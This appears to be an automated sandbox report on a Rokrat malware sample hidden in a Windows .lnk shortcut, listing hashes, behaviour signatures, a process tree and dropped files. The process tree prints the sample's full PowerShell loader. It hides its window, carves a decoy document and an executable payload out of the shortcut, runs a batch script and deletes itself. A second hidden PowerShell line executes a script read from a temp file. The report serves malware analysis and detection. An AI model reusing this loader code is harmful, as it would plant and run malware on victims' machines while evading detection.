Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-02-2024 04:58
Static task
static1
Behavioral task
behavioral1
Sample
mal.lnk
Resource
win7-20240221-en
General
-
Target
mal.lnk
-
Size
221.4MB
-
MD5
5f6682ad9da4590cba106e2f1a8cbe26
-
SHA1
7043c7c101532df47c832ce5270745dd3d1e8c08
-
SHA256
dbd5d662cc53d4b91cf7da9979cdffd1b4f702323bb9ec4114371bc6f4f0d4a6
-
SHA512
e744d1b0cf232c4cf224cd1413b13e41889692e2d1f29e948fe8d4a5cb1304bca9a7b5de9c34db98c8eb7440761d5233bc5ac6a4fe75de2d4009a06f318c1d35
-
SSDEEP
24576:P0sde6UvoEkUnigRXTTYdy830QtO0oIJjW7sFAc1Mh5l2yf:Mz6UvRXigjbaJa7f2yf
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2496-165-0x000000000C060000-0x000000000C143000-memory.dmp family_rokrat behavioral1/memory/2496-166-0x000000000C060000-0x000000000C143000-memory.dmp family_rokrat -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 4 2496 powershell.exe 6 2496 powershell.exe 8 2496 powershell.exe 9 2496 powershell.exe 11 2496 powershell.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
powershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 2684 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\26033.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\ rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp\ = "hwp_auto_file" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.hwp rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\hwp_auto_file\shell\Read\command rundll32.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
cmd.exepid process 2636 cmd.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2684 powershell.exe 2496 powershell.exe 2496 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2976 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2496 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AcroRd32.exepid process 2976 AcroRd32.exe 2976 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exepowershell.execsc.exerundll32.execmd.exepowershell.execsc.execsc.execsc.exedescription pid process target process PID 320 wrote to memory of 2636 320 cmd.exe cmd.exe PID 320 wrote to memory of 2636 320 cmd.exe cmd.exe PID 320 wrote to memory of 2636 320 cmd.exe cmd.exe PID 320 wrote to memory of 2636 320 cmd.exe cmd.exe PID 2636 wrote to memory of 2648 2636 cmd.exe cmd.exe PID 2636 wrote to memory of 2648 2636 cmd.exe cmd.exe PID 2636 wrote to memory of 2648 2636 cmd.exe cmd.exe PID 2636 wrote to memory of 2648 2636 cmd.exe cmd.exe PID 2636 wrote to memory of 2684 2636 cmd.exe powershell.exe PID 2636 wrote to memory of 2684 2636 cmd.exe powershell.exe PID 2636 wrote to memory of 2684 2636 cmd.exe powershell.exe PID 2636 wrote to memory of 2684 2636 cmd.exe powershell.exe PID 2684 wrote to memory of 2964 2684 powershell.exe csc.exe PID 2684 wrote to memory of 2964 2684 powershell.exe csc.exe PID 2684 wrote to memory of 2964 2684 powershell.exe csc.exe PID 2684 wrote to memory of 2964 2684 powershell.exe csc.exe PID 2964 wrote to memory of 2604 2964 csc.exe cvtres.exe PID 2964 wrote to memory of 2604 2964 csc.exe cvtres.exe PID 2964 wrote to memory of 2604 2964 csc.exe cvtres.exe PID 2964 wrote to memory of 2604 2964 csc.exe cvtres.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2684 wrote to memory of 2480 2684 powershell.exe rundll32.exe PID 2480 wrote to memory of 2976 2480 rundll32.exe AcroRd32.exe PID 2480 wrote to memory of 2976 2480 rundll32.exe AcroRd32.exe PID 2480 wrote to memory of 2976 2480 rundll32.exe AcroRd32.exe PID 2480 wrote to memory of 2976 2480 rundll32.exe AcroRd32.exe PID 2684 wrote to memory of 1100 2684 powershell.exe cmd.exe PID 2684 wrote to memory of 1100 2684 powershell.exe cmd.exe PID 2684 wrote to memory of 1100 2684 powershell.exe cmd.exe PID 2684 wrote to memory of 1100 2684 powershell.exe cmd.exe PID 1100 wrote to memory of 2496 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 2496 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 2496 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 2496 1100 cmd.exe powershell.exe PID 2496 wrote to memory of 2804 2496 powershell.exe csc.exe PID 2496 wrote to memory of 2804 2496 powershell.exe csc.exe PID 2496 wrote to memory of 2804 2496 powershell.exe csc.exe PID 2496 wrote to memory of 2804 2496 powershell.exe csc.exe PID 2804 wrote to memory of 2060 2804 csc.exe cvtres.exe PID 2804 wrote to memory of 2060 2804 csc.exe cvtres.exe PID 2804 wrote to memory of 2060 2804 csc.exe cvtres.exe PID 2804 wrote to memory of 2060 2804 csc.exe cvtres.exe PID 2496 wrote to memory of 1204 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1204 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1204 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1204 2496 powershell.exe csc.exe PID 1204 wrote to memory of 580 1204 csc.exe cvtres.exe PID 1204 wrote to memory of 580 1204 csc.exe cvtres.exe PID 1204 wrote to memory of 580 1204 csc.exe cvtres.exe PID 1204 wrote to memory of 580 1204 csc.exe cvtres.exe PID 2496 wrote to memory of 1532 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1532 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1532 2496 powershell.exe csc.exe PID 2496 wrote to memory of 1532 2496 powershell.exe csc.exe PID 1532 wrote to memory of 2160 1532 csc.exe cvtres.exe PID 1532 wrote to memory of 2160 1532 csc.exe cvtres.exe PID 1532 wrote to memory of 2160 1532 csc.exe cvtres.exe PID 1532 wrote to memory of 2160 1532 csc.exe cvtres.exe PID 2496 wrote to memory of 340 2496 powershell.exe csc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\mal.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0DD6DA21} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162E, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00042C00;$lnkFile.Read($pdfFile, 0, 0x00042C00);$pdfPath = $lnkPath.replace('.lnk','.hwp');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0004422E,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0011D630,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0011DBDA,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\py4ddipt.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71A8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7178.tmp"5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\mal.hwp4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\mal.hwp"5⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rukl6ztm.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA229.tmp"7⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ukph4mqo.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA268.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA257.tmp"7⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xknanuo7.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA2C5.tmp"7⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xkecb7mp.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA39F.tmp"7⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\CabCEA7.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\RES71A8.tmpFilesize
1KB
MD5409816885c25d71f3965d42eedab5ffe
SHA17c59fd7bcdc9d37333e32bad21d37eaea28c3a3d
SHA256a83f2640a02d41d838d0e2f0a709456db084782e4582fed1f1147055d22fc25f
SHA5129e4c0072c2564a32020f7b4840fb129f31df82bab527e68e9695add85911155f9a612c5127c266b7ef2f4d23523f4ef8cd33a3de29f50de1fe965634ccbba29e
-
C:\Users\Admin\AppData\Local\Temp\RESA22A.tmpFilesize
1KB
MD527c7bf5011abb63ea18688a6168afac2
SHA1384d1409881f57cd76d6699e13da3cf4dd3afc8f
SHA25671deb1fec7edba7df7c2ade5ccd3290c4d30fedf11a9b5625cd1fd9ba85a3c3e
SHA5120d964dac83c15e9702930be21b1240ffb03a52b1a89679c8fff057483487787222c81e2ecbaff9b9491fb62ff3d0531c7b1176e2587f54649d4983f7f3ccb662
-
C:\Users\Admin\AppData\Local\Temp\RESA268.tmpFilesize
1KB
MD56e59f905406a4d0f207efaa581516c46
SHA1831733acd6f90df97f42ec831805efc1a2f57455
SHA256106b0e1c5604ec3c9416dab648004f5e48287234dfa1278164f336dcb5688337
SHA512be328db64aa1576024e73417c3267bb56c9d9e0f0f6cd85e69cc04ddd14125d3980512e61c8a6573b89f952620121d3677e5839310a313203ab2d4860ebcb632
-
C:\Users\Admin\AppData\Local\Temp\RESA2C6.tmpFilesize
1KB
MD599dbd37d0a5613d131ab4ecf7e787efd
SHA18faed77f6059034bda2ccf3c09f3a88cea3af4fe
SHA256500797ce85a708f7e19ee3478caa006524ee29f836522534c64b52167ca7a19d
SHA5120e914adb4ae3420223ebf2dc0e49b35a8c02ad2875a76203a134edf32acaf31fc81b71e8df9065dfff5efa04926462a4e29417aa4c9d3ba6713351fc31042cae
-
C:\Users\Admin\AppData\Local\Temp\RESA3A0.tmpFilesize
1KB
MD56bffc66eafb1538b5b8245bbad89efab
SHA18f31d6c1d5acc8613a42ed6383afa419a698633f
SHA25611d800c6587e4119b32e9445956aa690fe1a6e22eb4115ef6e4c0d86764ace4f
SHA5121f97c4226635ccf30d44ed34068841099d92e4ca2a11381465d117cda06c50dcdd9c8699084a83acc969645ae2ccf6860e3d2f5c6a65dceb5429aed27c32eddb
-
C:\Users\Admin\AppData\Local\Temp\TarCF26.tmpFilesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
C:\Users\Admin\AppData\Local\Temp\mal.hwpFilesize
267KB
MD5d2a9da30bf1718349123ec813d055648
SHA15c5cd6f2461800adab4b1ab485fb49d9eebc4ab4
SHA256653202d94d655f9fafbb1217fba57d23f30a7e3ed7fe3272f237ec21e0731126
SHA512e3e9e526d6dc4544b460ca729383245e0298133fdcdf673fbad43f77dee2ed06ae592c1f55a6640bdf0791bf14a7424039b97f944f34e319525c0149bcf952cd
-
C:\Users\Admin\AppData\Local\Temp\py4ddipt.dllFilesize
3KB
MD5a4b7364583a6401a7dc0832a099a51bf
SHA13fa84d659351ef6549140b07a1f935203a18ced1
SHA256be325a7510fd878b022f4e1b442eb20095424a648076a4dc265720cf3ec88532
SHA51210b83e5957cb7ad0c2f1f5b6ddf91c51fa3df73feae2aa0cc72b5f8e1e225787eb0e035daa6582a90461261f4e73b4cec8586a6c0285770b0f8c8b94c7f46b5d
-
C:\Users\Admin\AppData\Local\Temp\py4ddipt.pdbFilesize
7KB
MD51b2ef87687664ef36c5be37fc697340a
SHA196238ab8777d693907df9bf2f430491a49c240d6
SHA256c38f5004a5b75e22555d4b155fcd4c7359bdd6b41ce829440ccae5771e4d9c3a
SHA512565cfa12b4cf62735ee8eda054b590700f12dfba7d58f9539697d91354462b05b551038f402be63ad13e68a89c9b9bb5c030ddea90bfe1081bcdc5667e0d4bb3
-
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.dllFilesize
3KB
MD5a66fa0827815f5b0419aca05b32f7b8b
SHA1ab6fa56b7d5b6a79829e4766c3d79a5e22fcc168
SHA2564b7dd8fe58dc437a20bc696bd3f8b39a92fbd0fa80df6947439ea801b912468c
SHA5124d37843ab228e4cd1bcb1d7ca776777c2f77f963ff2e2ae6e3b6c4add90bc7b342b982ebdbee7c1b58b3b7d8ee83032bd72eb5440b2759c89f71b365d1b5e74f
-
C:\Users\Admin\AppData\Local\Temp\rukl6ztm.pdbFilesize
7KB
MD53981326b7b1dfa1e813dc947d5f01305
SHA149e33a19cb97890297ed7e6bfd84db220ac7391a
SHA2567369e15a9b598b26ff7445e40318079903f7c94963bd6050c41d093ce6bac701
SHA512c9123c59fa5f1b0f609dea74fa4ef17ffec97689ee7e6a5fe2178ba20dc2291d945eeece06f2d0119f128df88a8aa371c7da7de9aa5d0f8cd379513c35caf3c4
-
C:\Users\Admin\AppData\Local\Temp\temp.datFilesize
1KB
MD578480139d86520ba82766c5b3c9a7479
SHA1436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a
SHA25685438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c
SHA512bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6
-
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.dllFilesize
3KB
MD59b2819e5439edb5ffe7d4e13f66c3ccc
SHA18aca0fdb4041e80b5fa2e08478af3c006bf0aea5
SHA256cf48adda3100b27720a3a2b7c9a606b6f862ad87c2e938de85bc97902a121e1b
SHA51297940e8ac5b729cc2e117a993e76d99c3c9a8b75966a8d1a65be338519a433f9bb39bdefd319200ae6d48459ab608138ed3aec5a89c9698b5e4f0f502d090456
-
C:\Users\Admin\AppData\Local\Temp\ukph4mqo.pdbFilesize
7KB
MD56bf2b6f9429c1a59a06030368507e73f
SHA183c037906f4b25b028d1f9929dfc7ba4f0ecc6d1
SHA256b537c3dce5de42d7d5375ca307d62c469da4198b8a41797c2650fe9059e51d60
SHA51258ebef400326ead45634aeabf53f4e366fb6020886a652bf4a7d8f91f1f213e04c30633e4c01a01ca2ab508fd971303bfa86c13e29f2d619b5eb72f6d91d599f
-
C:\Users\Admin\AppData\Local\Temp\working.batFilesize
311B
MD5a1640eb8f424ebe13b94955f8d0f6843
SHA18551e56c3e19861dbcae87f83b6d0ab225c3793d
SHA2566c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399
SHA5126b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8
-
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.dllFilesize
3KB
MD557c537bef22aae0d5c5c6f0243ca06c7
SHA125f9d045a5d4569006d9bb37312d21d1cb9d7831
SHA256cd4a56ddee939b9399f0a2f3faabf7ddd8187694b612ed430985eec65f9bf62d
SHA512dc6794cbabae9dd3e6f8b1eab9fa2b8de398ae0996f265012b7367beb2835550644701c1784a6af06be4742356149e01d4f6e0b16475de77af2746b3571cf65e
-
C:\Users\Admin\AppData\Local\Temp\xkecb7mp.pdbFilesize
7KB
MD5db2cdd624e830b3206e25ac4bc59853a
SHA1c49dd4057a0efd54762b16b9d3c1664bd16dcec6
SHA256ae5658eaa7b983d14403233a955127f2d967f5e77714b8d87438a24f8f010f0e
SHA512ac82bb96e8dbc8c1e2fe090fae53572191f2b04ee65ed4cd456eef2c58765441cf0bd7e5176281022764a9c1238c78605e9cfce93c35d5d9ee2bf6fbd457aeca
-
C:\Users\Admin\AppData\Local\Temp\xknanuo7.dllFilesize
3KB
MD5575ab5df23e130b4d0f25034059f87cd
SHA1d98c6ee2e10bc8b26df6b4e697c2ec9fec6f8da2
SHA25699b23aef8aa7a372d2518153e73b6998bdf5c9ad5bd33ba21d440ce1d625622d
SHA512d8c121621e45c827cf7e412c5793bb1946612817717696a91b661994426f8105c3024ac6e82b90b377d6dce4257e1fec3d0380b90bbe9266cefc57e1f25908de
-
C:\Users\Admin\AppData\Local\Temp\xknanuo7.pdbFilesize
7KB
MD58b14b1d8233eee0827a500493c3fcfc0
SHA115f3cdf6a47abb11ed5a92c31f40cc1b847c6fab
SHA2563a9284e06052baae6196dca9765746949731cc9c328026a191fce5383b3fbad7
SHA5121d5d96d99f0643c01f4a987d9b4bb90278bd696e93095d8efafa3da06d08aeb1108d6d8ba7d78f29d0d504f62f21cc9d014ec6c4161bb74c3bdbf694c7f30e0e
-
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEventsFilesize
3KB
MD555ee6264f8d6281b8529d2083f001b1b
SHA125884c0ec50473dbd9b35d6306265510e9eaa57c
SHA256791e1ce871c58ea10b3d241899e389ef95aa1491b6f8925f6a53e5d40cf749a5
SHA5121acf7db88cf0f16b849f93149f9a9d54a3c79678d9d8effe242ea7eeb263af2a6bda5dfcb488adf5643e0593e094c55deb82749bc711f5a6c48223a871529386
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD57c022289600ad8415e0a36206f6b50e4
SHA16a4623df8f64d2053f9e5edceb2ffd7077b6034c
SHA256149eb0f8cd6cdbfb8cf7f6a5b4ab56c78b8b5232ba48e5ec48217654c4313caa
SHA512a72bb418c66f06830e8ed9aa28ce17bf00cd6fbdc927263f2c9fed414993b5f3b9d09a70619d42ed01f94c075bcd46834692aae8534ffe85a501d6bfd4f0fc7d
-
C:\Users\Public\public.datFilesize
869KB
MD531aeb43b981d4d6272193e321bb21333
SHA184a21d2eb2847bcb53442e0aa7ab3f90dd796a61
SHA256903b02ff3ef690ea53103737a07c36a732bd81ab04f78d6f5eb61ac0fc6f98a6
SHA5127efb4cfd865a59b51b46e7071e3b346808a41621e893e6867658827c628d77866737697084c9b7c2cef110942aa2ad21e932642ef5feadb379cf8e7257b4cc88
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC7178.tmpFilesize
652B
MD56097be112ec97881c808860b929befaf
SHA157e4b6db93e2915a1f6caf3e7c64a4abc5ff4cda
SHA25690400c3aa711039f8e80b08ee994a37801215d5187f285f354cbc7a7d9ae166b
